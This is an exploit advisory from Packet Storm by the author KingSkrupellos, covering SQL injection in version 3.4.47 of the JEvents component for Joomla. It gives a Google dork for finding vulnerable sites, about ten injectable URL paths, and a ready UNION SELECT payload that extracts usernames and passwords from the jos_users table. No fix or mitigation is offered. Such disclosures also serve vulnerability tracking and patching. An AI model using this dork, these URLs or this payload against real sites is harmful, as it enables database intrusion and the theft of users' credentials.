Lucene search
KingSkrupellosPACKETSTORM:151429HistoryJan 31, 2019 - 12:00 a.m.
Joomla JEvents 3.4.47 SQL Injection
2019-01-3100:00:00
KingSkrupellos
packetstormsecurity.com
82
`####################################################################
# Exploit Title : Joomla JEvents Components 3.4.47 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 31/01/2019
# Vendor Homepage : jevents.net
# Software Download Link : jevents.net/download-area/jevents
# Software Information Link : extensions.joomla.org/extension/jevents/
# Software Version : 3.4.47
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_jevents''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description about Software :
***************************
JEvents is a well known and Loved Events Calendar / Management solution for Joomla.
JEvents provides a full events and calendar solution for your Joomla! site.
Showing your events in listings or as a visual monthly calendar view, create complex
repeats patterns, import and export your events with a couple of clicks, offer a feed
with your latest events. The JEvents calendar is translated into more than 40 languages
so we are likely to have a translation for your website. JEvents offer Complex repeating
event patterns, repeating event exceptions, importing and exporting of calendars,
a sophisticated layout editor for event detail, event calendar, upcoming event list
and even event creation pages.
####################################################################
# Impact :
**********
The JEvents 3.4.47 component for Joomla! is prone to an SQL-injection vulnerability
because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access
or modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application
and execute arbitrary SQL commands in application`s database.
Further exploitation of this vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser.
####################################################################
# SQL Injection Exploit :
**********************
/index.php?option=com_jevents&Itemid=[SQL Injection]
/index.php?option=com_jevents&task=month.calendar&Itemid=[SQL Injection]
/index.php?option=com_jevents&task=modlatest.rss&format=
feed&type=rss&Itemid=0&modid=[SQL Injection]
/index.php?option=com_jevents&task=month.calendar&year=
[YEAR]&month=[MONTH]&day=[DAY]&Itemid=[ID-NUMBER]&pop=[SQL Injection]
/index.php?option=com_jevents&task=year.listevents&day=
[DAY]&month=[MONTH]&year=[YEAR]&Itemid=0
/index.php?option=com_jevents&task=month.calendar&Itemid=
[ID-NUMBER]&year=[YEAR]&month=[MONTH]&day=[DAY][SQL Injection]
/index.php?option=com_jevents&task=icalrepeat.detail&evid=
[ID-NUMBER]&Itemid=[ID-NUMBER]&year=[YEAR]&month=
[MONTH]&day=[DAY][SQL Injection]
/index.php?option=com_jevents&task=cat.listevents&year=
[YEAR]&month=[MONTH]&day=[DAY]&Itemid=[ID-NUMBER]&pop=
[ID-NUMBER]&tmpl=component&limitstart=[SQL Injection]
/component/jevents/day.listevents/[YEAR]/[MONTH]/[DAY]
/index.php?option=com_jevents&task=month.calendar&catids=
[ID-NUMBER]&month=[MONTH]&year=[YEAR]&Itemid=[SQL Injection]
# Example Exploit Payload :
************************
union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################
`